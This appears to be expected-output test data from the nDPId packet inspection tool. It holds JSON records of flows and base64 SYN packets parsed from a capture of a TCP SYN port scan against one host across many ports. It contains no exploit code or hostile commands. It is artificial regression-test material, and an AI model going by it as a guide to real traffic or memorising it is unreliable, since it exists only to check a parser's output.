+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":564,"source":"synscan.pcap","alias":"nDPId-test","flow_id":557,"flow_packet_id":1,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059405,"pkt":"ACYLMQczACWzv5HuCABFAAAs8DEAACsGLUGsEAAIQA2GNIzTAAfdU4MZAAAAAGACEAAohQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":565,"source":"synscan.pcap","alias":"nDPId-test","flow_id":558,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10082,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":565,"source":"synscan.pcap","alias":"nDPId-test","flow_id":558,"flow_packet_id":1,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059405,"pkt":"ACYLMQczACWzv5HuCABFAAAsfrwAADUGlLasEAAIQA2GNIzTJ2LdU4MZAAAAAGACCAAJKgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":566,"source":"synscan.pcap","alias":"nDPId-test","flow_id":559,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":35500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":566,"source":"synscan.pcap","alias":"nDPId-test","flow_id":559,"flow_packet_id":1,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059405,"pkt":"ACYLMQczACWzv5HuCABFAAAsWGYAACYGygysEAAIQA2GNIzTiqzdU4MZAAAAAGACDACh3wAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":567,"source":"synscan.pcap","alias":"nDPId-test","flow_id":560,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9595,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":567,"source":"synscan.pcap","alias":"nDPId-test","flow_id":560,"flow_packet_id":1,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059405,"pkt":"ACYLMQczACWzv5HuCABFAAAsiV4AACoGlRSsEAAIQA2GNIzTJXvdU4MZAAAAAGACDAAHEQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":568,"source":"synscan.pcap","alias":"nDPId-test","flow_id":561,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059406,"flow_last_seen":1278275059406,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059406,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1259,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":568,"source":"synscan.pcap","alias":"nDPId-test","flow_id":561,"flow_packet_id":1,"flow_last_seen":1278275059406,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059406,"pkt":"ACYLMQczACWzv5HuCABFAAAsgV0AADcGkBWsEAAIQA2GNIzTBOvdU4MZAAAAAGACEAAjoQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":569,"source":"synscan.pcap","alias":"nDPId-test","flow_id":562,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059406,"flow_last_seen":1278275059406,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059406,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32776,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":569,"source":"synscan.pcap","alias":"nDPId-test","flow_id":562,"flow_packet_id":1,"flow_last_seen":1278275059406,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059406,"pkt":"ACYLMQczACWzv5HuCABFAAAsCGAAACgGGBOsEAAIQA2GNIzTgAjdU4MZAAAAAGACBAC0gwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":570,"source":"synscan.pcap","alias":"nDPId-test","flow_id":563,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059406,"flow_last_seen":1278275059406,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059406,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1065,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":570,"source":"synscan.pcap","alias":"nDPId-test","flow_id":563,"flow_packet_id":1,"flow_last_seen":1278275059406,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059406,"pkt":"ACYLMQczACWzv5HuCABFAAAsAjcAADUGETysEAAIQA2GNIzTBCndU4MZAAAAAGACCAAsYwAAAgQFtA=="} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":571,"source":"synscan.pcap","alias":"nDPId-test","flow_id":523,"flow_packet_id":2,"flow_last_seen":1278275059407,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1278275059407,"pkt":"ACWzv5HuACYLMQczCABFAAAoAABAADYG0nZADYY0rBAACABxjN09N4eJ3FKCGVAUAACM+wAAAAAAAAAA"} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":572,"source":"synscan.pcap","alias":"nDPId-test","flow_id":564,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059408,"flow_last_seen":1278275059408,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059408,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":212,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":572,"source":"synscan.pcap","alias":"nDPId-test","flow_id":564,"flow_packet_id":1,"flow_last_seen":1278275059408,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059408,"pkt":"ACYLMQczACWzv5HuCABFAAAsOWsAAC4G4QesEAAIQA2GNIzSANTdUoMYAAAAAGACDAAruwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":573,"source":"synscan.pcap","alias":"nDPId-test","flow_id":565,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059409,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":65129,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":573,"source":"synscan.pcap","alias":"nDPId-test","flow_id":565,"flow_packet_id":1,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059409,"pkt":"ACYLMQczACWzv5HuCABFAAAsMW0AACoG7QWsEAAIQA2GNIzS\/mndUoMYAAAAAGACDAAuJQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":574,"source":"synscan.pcap","alias":"nDPId-test","flow_id":566,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059409,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1185,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":574,"source":"synscan.pcap","alias":"nDPId-test","flow_id":566,"flow_packet_id":1,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059409,"pkt":"ACYLMQczACWzv5HuCABFAAAsLzIAADsG3kCsEAAIQA2GNIzSBKHdUoMYAAAAAGACEAAj7gAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":575,"source":"synscan.pcap","alias":"nDPId-test","flow_id":567,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059409,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":575,"source":"synscan.pcap","alias":"nDPId-test","flow_id":567,"flow_packet_id":1,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059409,"pkt":"ACYLMQczACWzv5HuCABFAAAspIkAADYGbemsEAAIQA2GNIzSIzHdUoMYAAAAAGACDAAJXgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":576,"source":"synscan.pcap","alias":"nDPId-test","flow_id":568,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059409,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1248,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":576,"source":"synscan.pcap","alias":"nDPId-test","flow_id":568,"flow_packet_id":1,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059409,"pkt":"ACYLMQczACWzv5HuCABFAAAsMNEAACwG66GsEAAIQA2GNIzSBODdUoMYAAAAAGACBAAvrwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":577,"source":"synscan.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059409,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1058,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":577,"source":"synscan.pcap","alias":"nDPId-test","flow_id":569,"flow_packet_id":1,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059409,"pkt":"ACYLMQczACWzv5HuCABFAAAsIoAAACUGAPOsEAAIQA2GNIzSBCLdUoMYAAAAAGACCAAsbQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":578,"source":"synscan.pcap","alias":"nDPId-test","flow_id":570,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059409,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5988,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":578,"source":"synscan.pcap","alias":"nDPId-test","flow_id":570,"flow_packet_id":1,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059409,"pkt":"ACYLMQczACWzv5HuCABFAAAspaIAACwGdtCsEAAIQA2GNIzSF2TdUoMYAAAAAGACBAAdKwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":579,"source":"synscan.pcap","alias":"nDPId-test","flow_id":571,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059409,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1277,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":579,"source":"synscan.pcap","alias":"nDPId-test","flow_id":571,"flow_packet_id":1,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059409,"pkt":"ACYLMQczACWzv5HuCABFAAAswhQAADEGVV6sEAAIQA2GNIzSBP3dUoMYAAAAAGACCAArkgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":580,"source":"synscan.pcap","alias":"nDPId-test","flow_id":572,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059409,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2126,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":580,"source":"synscan.pcap","alias":"nDPId-test","flow_id":572,"flow_packet_id":1,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059409,"pkt":"ACYLMQczACWzv5HuCABFAAAsL3kAADQG5PmsEAAIQA2GNIzSCE7dUoMYAAAAAGACBAAsQQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":581,"source":"synscan.pcap","alias":"nDPId-test","flow_id":573,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059409,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1216,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":581,"source":"synscan.pcap","alias":"nDPId-test","flow_id":573,"flow_packet_id":1,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059409,"pkt":"ACYLMQczACWzv5HuCABFAAAsCL0AADsGBLasEAAIQA2GNIzSBMDdUoMYAAAAAGACEAAjzwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":582,"source":"synscan.pcap","alias":"nDPId-test","flow_id":574,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059409,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9091,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":582,"source":"synscan.pcap","alias":"nDPId-test","flow_id":574,"flow_packet_id":1,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059409,"pkt":"ACYLMQczACWzv5HuCABFAAAsWKoAADoGtcisEAAIQA2GNIzSI4PdUoMYAAAAAGACDAAJDAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":583,"source":"synscan.pcap","alias":"nDPId-test","flow_id":575,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059409,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1455,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":583,"source":"synscan.pcap","alias":"nDPId-test","flow_id":575,"flow_packet_id":1,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059409,"pkt":"ACYLMQczACWzv5HuCABFAAAs5noAACsGNvisEAAIQA2GNIzSBa\/dUoMYAAAAAGACEAAi4AAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":584,"source":"synscan.pcap","alias":"nDPId-test","flow_id":576,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059409,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":584,"source":"synscan.pcap","alias":"nDPId-test","flow_id":576,"flow_packet_id":1,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059409,"pkt":"ACYLMQczACWzv5HuCABFAAAshFYAACUGnxysEAAIQA2GNIzSA\/HdUoMYAAAAAGACCAAsngAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":585,"source":"synscan.pcap","alias":"nDPId-test","flow_id":577,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059409,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":585,"source":"synscan.pcap","alias":"nDPId-test","flow_id":577,"flow_packet_id":1,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059409,"pkt":"ACYLMQczACWzv5HuCABFAAAset0AACcGppWsEAAIQA2GNIzSJxHdUoMYAAAAAGACEAABfgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":586,"source":"synscan.pcap","alias":"nDPId-test","flow_id":578,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059409,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8292,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":586,"source":"synscan.pcap","alias":"nDPId-test","flow_id":578,"flow_packet_id":1,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059409,"pkt":"ACYLMQczACWzv5HuCABFAAAsAccAACkGHaysEAAIQA2GNIzSIGTdUoMYAAAAAGACCAAQKwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":587,"source":"synscan.pcap","alias":"nDPId-test","flow_id":579,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059409,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":55600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":587,"source":"synscan.pcap","alias":"nDPId-test","flow_id":579,"flow_packet_id":1,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059409,"pkt":"ACYLMQczACWzv5HuCABFAAAs5RsAACYGPVesEAAIQA2GNIzS2TDdUoMYAAAAAGACDABTXgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":588,"source":"synscan.pcap","alias":"nDPId-test","flow_id":580,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059409,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":588,"source":"synscan.pcap","alias":"nDPId-test","flow_id":580,"flow_packet_id":1,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059409,"pkt":"ACYLMQczACWzv5HuCABFAAAsSPQAADYGyX6sEAAIQA2GNIzSTiXdUoMYAAAAAGACDADeaQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":589,"source":"synscan.pcap","alias":"nDPId-test","flow_id":581,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1036,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":589,"source":"synscan.pcap","alias":"nDPId-test","flow_id":581,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAswj8AAC4GWDOsEAAIQA2GNIzSBAzdUoMYAAAAAGACDAAogwAAAgQFtA=="} 